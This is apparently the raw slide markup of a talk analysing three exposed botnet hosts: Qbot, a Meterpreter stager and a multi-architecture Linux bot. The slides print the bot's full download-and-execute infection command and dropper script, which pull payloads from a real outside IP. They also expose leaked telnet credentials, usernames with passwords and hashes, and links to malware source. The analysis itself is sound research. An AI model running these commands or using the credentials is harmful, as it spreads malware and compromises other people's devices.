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e03ab80cc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e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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e03ab80cc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e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80c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4e03ab80c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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc_0_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4e03ab80cc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4e03ab80cc_0_2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4e03ab80cc_0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e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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e03ab80cc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e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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4e03ab80cc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e03ab80cc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4e03ab80cc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77250" y="552062"/>
            <a:ext cx="3013100" cy="4039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github.com/AgentCri/CnC/blob/ecacec9cfe9874cfa6c54cfed239faa29ab75bac/Clients/(QBOT)%20Unix%20Client.c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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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github.com/b1narythag0d/Ultron-2.0-Vision" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.gif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3.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29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s://gironsec.com/blog" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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0" y="744575"/>
            <a:ext cx="8520600" cy="110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Yet Another Botnet Find</a:t>
            </a:r>
            <a:endParaRPr/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437525" y="43509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Joe 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GetRandomPublicIP()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="115" name="Google Shape;11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5014400" cy="268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6625" y="1298675"/>
            <a:ext cx="3672400" cy="2657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 wait, how do you have source?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122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quick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cursory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> search on githib with a few names of the functions (like ‘StartTheLelz’) I saw quickly gave me source code. Qbot.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https://github.com/AgentCri/CnC/blob/ecacec9cfe9874cfa6c54cfed239faa29ab75bac/Clients/(QBOT)%20Unix%20Client.c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 wasn’t expecting some complex shit on a PUBLIC EXPOSED IP address.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The github link posted does a better job explaining the rest of the functionality. Check passwords, connect, spread, flood UPD, TCP, etc.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 what about the goods? What about da hax?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128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‘infected’ text files seem to contain usernames, passwords, IP addresses and ports. All of which seem to be telnet. Who the hell uses telnet? These people...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9" name="Google Shape;12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525" y="1977950"/>
            <a:ext cx="7052150" cy="294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Wrap up of first botnet host</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="6364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user/passes in these files don’t add up - the passwords inside don’t match what’s in the bot. Exmaple: 104.206.241.222:23 root:t0talc0ntr0l4!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Most of these accounts aren’t root shells either, but are you really that picky?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6" name="Google Shape;13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5150" y="1051222"/>
            <a:ext cx="2210425" cy="331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Second Bot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="362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didn’t just find 1 botnet host. I found 3.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This second host had a single EXE file.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Windows? Who the hell targets that???</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Google Shape;14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9447" y="728463"/>
            <a:ext cx="5174550" cy="3686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it and what does it do?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="2869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Like all suspected windows executables on the net, it’s packed, because of course it is. Before you ask how I know, you can just tell looking at strings and the lack of exported / import functions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="150" name="Google Shape;15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5850" y="1152475"/>
            <a:ext cx="5774574" cy="272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Unpacking this was trivial</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978725" y="1880525"/>
            <a:ext cx="3257700" cy="16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might be the dunning-kruger effect, but this was pretty easy for me. Just located the VirtualAlloc call that was setting the protection type to ‘execute’ that loaded the encrypted strings I saw earlier.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 on run, locate buffer, save.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7" name="Google Shape;15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9425" y="1114200"/>
            <a:ext cx="3762375" cy="361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EZ - PZ</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="Google Shape;16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3925" y="1017725"/>
            <a:ext cx="6425985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in the new executable?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169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Meterpreter shell.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How did I come up with this?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Again, look at the function names (why don’t people strip these?) and browse github.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="170" name="Google Shape;17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0325" y="2741100"/>
            <a:ext cx="5257800" cy="224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Here’s our relfective dll injection loader function...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="176" name="Google Shape;17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8183" y="1307650"/>
            <a:ext cx="5214169" cy="341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Whilst crawling the interbutts, I found something</a:t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7406674" cy="397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8500" y="1192500"/>
            <a:ext cx="2945776" cy="28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 named ‘packet_call_completion_handlers’</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="Google Shape;18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1351" y="1082550"/>
            <a:ext cx="5390451" cy="3738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Found it in meterpreter source code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188" name="Google Shape;18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6077" y="1128100"/>
            <a:ext cx="4792850" cy="386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Wrapping up Bot 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194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Just a meterpreter exe. Likely a staging point for metasploit. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="195" name="Google Shape;19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7950" y="1639325"/>
            <a:ext cx="4086125" cy="3064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Bot 3 - The other linux one</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201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Much larger hall of users / passes this time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More binaries too</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="202" name="Google Shape;20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6149" y="650150"/>
            <a:ext cx="4201300" cy="461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Before you ask, the pcaps are lame. Nothing good.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="208" name="Google Shape;20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625" y="1389927"/>
            <a:ext cx="7214524" cy="3150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we have this time? More Complex than #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="214" name="Google Shape;21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1025" y="1240025"/>
            <a:ext cx="6200775" cy="309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passwords, more users, more architecures </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="220" name="Google Shape;22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7024" y="1188475"/>
            <a:ext cx="1897400" cy="3801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1525" y="1272350"/>
            <a:ext cx="3950126" cy="353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Did you find the source too? You betcha!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227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https://github.com/b1narythag0d/Ultron-2.0-Vision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28" name="Google Shape;228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06475" y="1679725"/>
            <a:ext cx="4495800" cy="308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in the JSON files?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Google Shape;234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big huge one ‘servers.json’ contains the following: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,.{   "ip": "184.95.45.22",   "timestamp": "1537106844", "ports": [ {"port": 63922, "proto": "tcp", "status": "open", "reason": "syn-ack", "ttl": 52} ] }.,.{   "ip": "108.170.33.182",   "timestamp": "1537106844", "ports": [ {"port": 38445, "proto": "tcp", "status": "open", "reason": "syn-ack", "ttl": 52} ] }.,.{   "ip": "184.95.45.22",   "timestamp": "1537106845", "ports": [ {"port": 24884, "proto": "tcp", "status": "open", "reason": "syn-ack", "ttl": 52} ] }.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Ports, IP’s, timestamps. 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Visit one of the IP’s and they all seem to be nginx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="240" name="Google Shape;24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0025" y="1135175"/>
            <a:ext cx="5014363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88600" y="151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I have to save that shit ASAP</a:t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4698" y="852000"/>
            <a:ext cx="7214624" cy="4179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about the other JSON file?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246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Usernames, passwords and hashes!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"14673":{"username":"Deadmau5_5_","hash":"$1$9M4L+1Df$cGT1IOC58njMFfJZUBPbM0","password":"general23"},"14674":{"username":"leelucky2","hash":"$1$9M4L+1Df$cGT1IOC58njMFfJZUBPbM0","password":"general23"}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This file is HUGE. Shitloads of hashes, usernames, passwords. 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do we go from here?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p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Figure out what the ip addresses / ports are for.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Figure out what the user/passes are for.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Find more botnets!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?????????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Profit!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pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;25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0438" y="2125963"/>
            <a:ext cx="1571625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98" y="1406225"/>
            <a:ext cx="3466300" cy="3514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265" name="Google Shape;265;p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to come on my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website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https://gironsec.com/blog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66" name="Google Shape;266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9125" y="298200"/>
            <a:ext cx="3935275" cy="393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we have here? </a:t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whole crapload of usernames, passwords, IP addresses(3 million by my count) and a bot in different flavors.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0350" y="2329563"/>
            <a:ext cx="5143500" cy="216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about the bots?</a:t>
            </a:r>
            <a:endParaRPr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 are a number of bot clients in various architectures ranging from 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>rm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Mips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Power Pc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Sparc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Itanium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Super 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x86/x64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Whoever made this had a goal in mind - infected all the Linuxes!</a:t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8051" y="1651950"/>
            <a:ext cx="2610524" cy="220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inside the bots?</a:t>
            </a:r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525" y="1426675"/>
            <a:ext cx="6667500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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4411225" y="2642075"/>
            <a:ext cx="40266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strings make it obvious what it’s doing...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we have our command string...</a:t>
            </a:r>
            <a:endParaRPr/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cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.125/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.10.68.125 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.10.68.125; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.10.68.125 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit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Tl;dr - grab some bash files, throw them in various places, chmod them, run them, delete them.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Here’s the contents of one of the shell scripts...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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311700" y="1152475"/>
            <a:ext cx="8520600" cy="388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-e #!/bin/bash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-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.125/ntpd; chmod +x ntpd; ./ntpd; rm -rf ntpd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-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.125/sh; chmod +x sh; ./sh; rm -rf sh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00"/>
                </a:highlight>
              </a:rPr>
              <a:t>-e cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.125/' '; chmod +x ' '; ./' '; rm -rf ' '</a:t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>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>^^^ I highlighted the most interesting one. The apache index doesn’t support directly spaces for file names, as a result, the browser won’t be able to browse to it directly. Bug or feature?</a:t>
            </a:r>
            <a:endParaRPr sz="140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replace common programs with zombie progs?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108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Yes. After this is done, the next piece of code it runs replication.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 process is simple - find a random IP, try the list of users</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and passwords from before, then attempt to connect / auth.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How does it find a random IP programmatically?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Just does a random number 0-255 on each of the 4 octets.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Of course it seems to skip the private network ranges.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="Google Shape;10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3950" y="1202425"/>
            <a:ext cx="2023226" cy="348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